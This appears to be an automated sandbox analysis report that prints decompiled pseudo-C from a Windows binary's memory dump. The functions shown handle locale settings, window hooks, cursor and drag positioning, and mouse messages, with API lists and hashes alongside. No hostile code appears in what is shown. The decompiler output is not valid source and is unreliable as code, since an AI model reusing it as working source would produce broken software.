                                                                        			E00409C5C(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409cf3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E004099D4(GetThreadLocale(), 0x409d08, 0x100b,  &_v8);
				_t29 = E004087C0(0x409d08, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409BA8, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49681c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409BE4, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409CFA);
				return E00404348( &_v8);
			}










                                                                        0x00409c5c
                                                                        0x00409c5f
                                                                        0x00409c64
                                                                        0x00409c65
                                                                        0x00409c6a
                                                                        0x00409c6d
                                                                        0x00409c83
                                                                        0x00409c95
                                                                        0x00409c9f
                                                                        0x00409caf
                                                                        0x00409cb4
                                                                        0x00409cb9
                                                                        0x00409cbe
                                                                        0x00409cbe
                                                                        0x00409cc4
                                                                        0x00409cc7
                                                                        0x00409cc7
                                                                        0x00409cd8
                                                                        0x00409cd8
                                                                        0x00409cdf
                                                                        0x00409ce2
                                                                        0x00409ce5
                                                                        0x00409cf2

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409CF3,?,?,00000000), ref: 00409C74
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409CF3,?,?,00000000), ref: 00409CA4
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BA8,00000000,00000000,00000004), ref: 00409CAF
                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409CF3,?,?,00000000), ref: 00409CCD
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BE4,00000000,00000000,00000003), ref: 00409CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                        • String ID:
                                                                        • API String ID: 4102113445-0
                                                                        • Opcode ID: 790f7a62ba9bfdb9f10ecce0afa5b16d7d82922cee3855c682fc3fe35e3b7d87
                                                                        • Instruction ID: d1406e9af6801d42e4c1d76f03b95420f91cc8fef24ea995857c9060e22c89c4
                                                                        • Opcode Fuzzy Hash: 790f7a62ba9bfdb9f10ecce0afa5b16d7d82922cee3855c682fc3fe35e3b7d87
                                                                        • Instruction Fuzzy Hash: 6401F7716046046EE701B7759D13FAA719CDF41B28F224137F801B7AC2D63C9E0086AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454F68, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454F68() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x496c1c != 0) {
					_t10 =  *0x496c1c; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x496c1c = 0;
				if( *0x496c20 != 0) {
					_t2 =  *0x496c18; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x496c14) {
						_t8 =  *0x496c20; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x496c20; // 0x0
					CloseHandle(_t5);
					 *0x496c20 = 0;
					return 0;
				}
				return 0;
			}







                                                                        0x00454f6f
                                                                        0x00454f71
                                                                        0x00454f77
                                                                        0x00454f77
                                                                        0x00454f7e
                                                                        0x00454f8a
                                                                        0x00454f8c
                                                                        0x00454f92
                                                                        0x00454fa2
                                                                        0x00454fa6
                                                                        0x00454fac
                                                                        0x00454fac
                                                                        0x00454fb1
                                                                        0x00454fb7
                                                                        0x00454fbe
                                                                        0x00000000
                                                                        0x00454fbe
                                                                        0x00454fc3

                                                                        APIs
                                                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00454F77
                                                                        • SetEvent.KERNEL32(00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454F92
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F97
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FAC
                                                                        • CloseHandle.KERNEL32(00000000,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                        • String ID:
                                                                        • API String ID: 2429646606-0
                                                                        • Opcode ID: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction ID: 98b08e2d4b11bd526172336b730c09841e2ca8282cf2238b0d719a92ae855655
                                                                        • Opcode Fuzzy Hash: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction Fuzzy Hash: C1F01C716041009AC710FBBDDD85E1536E4E718349B03493BB581E71A5CB3DD480CF1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004573E0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 289COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E004573E0(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44d464; // 0x44d468
				E00404D24( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x45778b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044D81C() == 0 || E00454DE0(E00434E58( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E004571F4( *_t262);
					} else {
						E00456FFC( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0045722C();
					_v84 = E004541A4();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E00435F4C( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x4323f0; // 0x43243c
						_t171 = E00403768(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E004360F0( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00454DA8( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E004336E0(_v148,  &_v140,  &_v144, _t333);
					E004043E0( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x47aaf0; // 0x432a84
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00437760( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E00457380(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E0043674C( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00454EF4(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00456FFC( *_t262, 1, _v48);
						} else {
							E00456FFC( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x457792);
						E0040436C( &_v148, 2);
						_t284 =  *0x44d464; // 0x44d468
						return E00404DF4( &_v100, _t284);
					}
				}
			}











































                                                                        0x004573e1
                                                                        0x004573ee
                                                                        0x004573f4
                                                                        0x004573ff
                                                                        0x00457400
                                                                        0x00457401
                                                                        0x00457407
                                                                        0x0045740d
                                                                        0x00457412
                                                                        0x00457417
                                                                        0x00457418
                                                                        0x0045741d
                                                                        0x00457420
                                                                        0x00457425
                                                                        0x00457432
                                                                        0x00457744
                                                                        0x00457744
                                                                        0x00457747
                                                                        0x00457749
                                                                        0x0045775a
                                                                        0x0045774b
                                                                        0x00457751
                                                                        0x00457751
                                                                        0x00000000
                                                                        0x0045746b
                                                                        0x00457470
                                                                        0x00457476
                                                                        0x0045747c
                                                                        0x00457484
                                                                        0x00457491
                                                                        0x00457499
                                                                        0x004574a4
                                                                        0x004574af
                                                                        0x004574b0
                                                                        0x004574b1
                                                                        0x004574b2
                                                                        0x004574bd
                                                                        0x004574c2
                                                                        0x004574c7
                                                                        0x004574cf
                                                                        0x004574d2
                                                                        0x004574d4
                                                                        0x004574e4
                                                                        0x004574e9
                                                                        0x004574ef
                                                                        0x004574f4
                                                                        0x004574f6
                                                                        0x004574f8
                                                                        0x004574ff
                                                                        0x0045750c
                                                                        0x0045750c
                                                                        0x004574ff
                                                                        0x004574d6
                                                                        0x004574dd
                                                                        0x004574dd
                                                                        0x00457523
                                                                        0x00457536
                                                                        0x00457541
                                                                        0x0045754a
                                                                        0x00457558
                                                                        0x00457569
                                                                        0x00457577
                                                                        0x0045757e
                                                                        0x00457586
                                                                        0x00457589
                                                                        0x0045758e
                                                                        0x00457593
                                                                        0x004575ad
                                                                        0x004575b5
                                                                        0x004575d5
                                                                        0x004575d5
                                                                        0x004575df
                                                                        0x004575e9
                                                                        0x004575ed
                                                                        0x004575ed
                                                                        0x004575ed
                                                                        0x004575ef
                                                                        0x004575f1
                                                                        0x004575fa
                                                                        0x00000000
                                                                        0x00457600
                                                                        0x00457600
                                                                        0x00457604
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045760e
                                                                        0x00457626
                                                                        0x00457641
                                                                        0x00457653
                                                                        0x0045766b
                                                                        0x00457686
                                                                        0x004576a2
                                                                        0x004576a2
                                                                        0x004576b3
                                                                        0x004576b8
                                                                        0x004576c0
                                                                        0x004576c9
                                                                        0x004576da
                                                                        0x004576df
                                                                        0x004576e7
                                                                        0x004576f0
                                                                        0x004576fe
                                                                        0x00457717
                                                                        0x0045771d
                                                                        0x00457722
                                                                        0x00457727
                                                                        0x0045773d
                                                                        0x00457729
                                                                        0x0045772f
                                                                        0x0045772f
                                                                        0x0045775f
                                                                        0x00457761
                                                                        0x00457764
                                                                        0x00457767
                                                                        0x00457777
                                                                        0x0045777f
                                                                        0x0045778a
                                                                        0x0045778a
                                                                        0x004575fa

                                                                        APIs
                                                                          • Part of subcall function 0044D81C: GetActiveWindow.USER32 ref: 0044D81F
                                                                          • Part of subcall function 0044D81C: GetCurrentThreadId.KERNEL32 ref: 0044D834
                                                                          • Part of subcall function 0044D81C: 72E7AC10.USER32(00000000,0044D7FC), ref: 0044D83A
                                                                          • Part of subcall function 0045722C: GetCursor.USER32(?), ref: 00457247
                                                                          • Part of subcall function 0045722C: GetIconInfo.USER32(00000000,?), ref: 0045724D
                                                                        • ClientToScreen.USER32(?,?), ref: 0045750C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457523
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457653
                                                                          • Part of subcall function 00456FFC: SetTimer.USER32(00000000,00000000,?,00454E00), ref: 00457016
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                                                        • String ID: <$C
                                                                        • API String ID: 3022406661-3423417450
                                                                        • Opcode ID: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction ID: 30bf7d25c4205cc9a04f9c4c997c4720ffd439aca70f5178930e4931d0ecf433
                                                                        • Opcode Fuzzy Hash: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction Fuzzy Hash: C9D1F575A00618CFCB00DFA8D884A9EB7F5BF49304F1580AAE904EB366DB34AD49CF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00440F1C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00440F1C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_push(__edi);
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x4412f4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E0043F9A8(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E00434E0C();
									E004372AC( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x4412fb);
						return E00404348( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E00435F4C(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E004365AC(_t300,  &_v76);
								E0040439C( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E00404348( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E00440E00(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E0044094C(_v8, __eflags);
					} else {
						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x44c130; // 0x44c17c
								_t186 = E00403768( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E004364CC(_t295, 0);
								} else {
									E00453004(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E004360F0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E0043CC2C( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E0043B7C0( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x495c2c; // 0x496c08
					SetCursor(E0045469C( *_t209,  *((short*)(0x47a9d0 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E00440A00(_v8);
						E00407314( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E00440E88(_t306);
						E00440A00(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E0043CC2C( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x4323f0; // 0x43243c
							_t236 = E00403768( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc0))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E00436C54(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E004408EC(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}








































                                                                        0x00440f1c
                                                                        0x00440f1d
                                                                        0x00440f24
                                                                        0x00440f27
                                                                        0x00440f2a
                                                                        0x00440f2c
                                                                        0x00440f31
                                                                        0x00440f32
                                                                        0x00440f37
                                                                        0x00440f3a
                                                                        0x00440f3d
                                                                        0x00440f3f
                                                                        0x00440f44
                                                                        0x00440f68
                                                                        0x00440f68
                                                                        0x00440f6d
                                                                        0x00440fee
                                                                        0x00441001
                                                                        0x00441003
                                                                        0x00441005
                                                                        0x0044100b
                                                                        0x0044100f
                                                                        0x00441015
                                                                        0x00441019
                                                                        0x0044101f
                                                                        0x0044102d
                                                                        0x0044102d
                                                                        0x00441019
                                                                        0x0044100f
                                                                        0x004412c9
                                                                        0x004412d1
                                                                        0x004412db
                                                                        0x004412db
                                                                        0x004412de
                                                                        0x004412e0
                                                                        0x004412e3
                                                                        0x004412e6
                                                                        0x004412f3
                                                                        0x004412f3
                                                                        0x00440f6f
                                                                        0x00440f6f
                                                                        0x00440f74
                                                                        0x00441207
                                                                        0x0044120a
                                                                        0x0044120e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441225
                                                                        0x00441227
                                                                        0x0044122b
                                                                        0x0044123d
                                                                        0x0044123f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441248
                                                                        0x00441248
                                                                        0x0044124b
                                                                        0x00441256
                                                                        0x0044125b
                                                                        0x0044126a
                                                                        0x00441274
                                                                        0x0044127f
                                                                        0x0044128f
                                                                        0x0044129f
                                                                        0x004412a7
                                                                        0x004412b5
                                                                        0x004412c3
                                                                        0x004412c4
                                                                        0x004412c5
                                                                        0x004412c6
                                                                        0x00000000
                                                                        0x004412c6
                                                                        0x0044124d
                                                                        0x00441250
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441250
                                                                        0x00441233
                                                                        0x00000000
                                                                        0x00440f7a
                                                                        0x00440f7a
                                                                        0x00440f7d
                                                                        0x00440f83
                                                                        0x00440f86
                                                                        0x00440f8c
                                                                        0x00440f9b
                                                                        0x00440f9b
                                                                        0x00440f8c
                                                                        0x00000000
                                                                        0x00440f7d
                                                                        0x00440f74
                                                                        0x00440f46
                                                                        0x004410ea
                                                                        0x004410ee
                                                                        0x0044114e
                                                                        0x004410f0
                                                                        0x004410f6
                                                                        0x00441109
                                                                        0x0044110b
                                                                        0x0044110d
                                                                        0x00441113
                                                                        0x00441117
                                                                        0x0044111d
                                                                        0x00441122
                                                                        0x00441128
                                                                        0x0044112d
                                                                        0x0044112f
                                                                        0x00441141
                                                                        0x00441131
                                                                        0x00441133
                                                                        0x00441133
                                                                        0x0044112f
                                                                        0x00441117
                                                                        0x0044110d
                                                                        0x00000000
                                                                        0x004410ee
                                                                        0x00440f4c
                                                                        0x00440f4f
                                                                        0x0044115c
                                                                        0x0044116d
                                                                        0x00441175
                                                                        0x0044117b
                                                                        0x0044117e
                                                                        0x00441183
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441194
                                                                        0x00441197
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411a8
                                                                        0x004411aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411be
                                                                        0x004411c0
                                                                        0x004411c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411c8
                                                                        0x004411cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411e1
                                                                        0x004411ee
                                                                        0x004411f3
                                                                        0x00000000
                                                                        0x004411f3
                                                                        0x00440f55
                                                                        0x00440f5a
                                                                        0x00440fa5
                                                                        0x00440fa8
                                                                        0x00440fac
                                                                        0x00440fb5
                                                                        0x00440fc0
                                                                        0x00440fc5
                                                                        0x00440fcb
                                                                        0x00440fd1
                                                                        0x00440fd5
                                                                        0x00440fde
                                                                        0x00440fde
                                                                        0x00000000
                                                                        0x00440fac
                                                                        0x00440f5d
                                                                        0x0044103d
                                                                        0x00441042
                                                                        0x00441050
                                                                        0x00441052
                                                                        0x00441054
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044105a
                                                                        0x0044105e
                                                                        0x00441072
                                                                        0x00441076
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441098
                                                                        0x0044109d
                                                                        0x0044109f
                                                                        0x004410a4
                                                                        0x004410aa
                                                                        0x004410af
                                                                        0x004410b1
                                                                        0x004410b8
                                                                        0x004410b8
                                                                        0x004410b1
                                                                        0x004410be
                                                                        0x004410c1
                                                                        0x004410c8
                                                                        0x004410ce
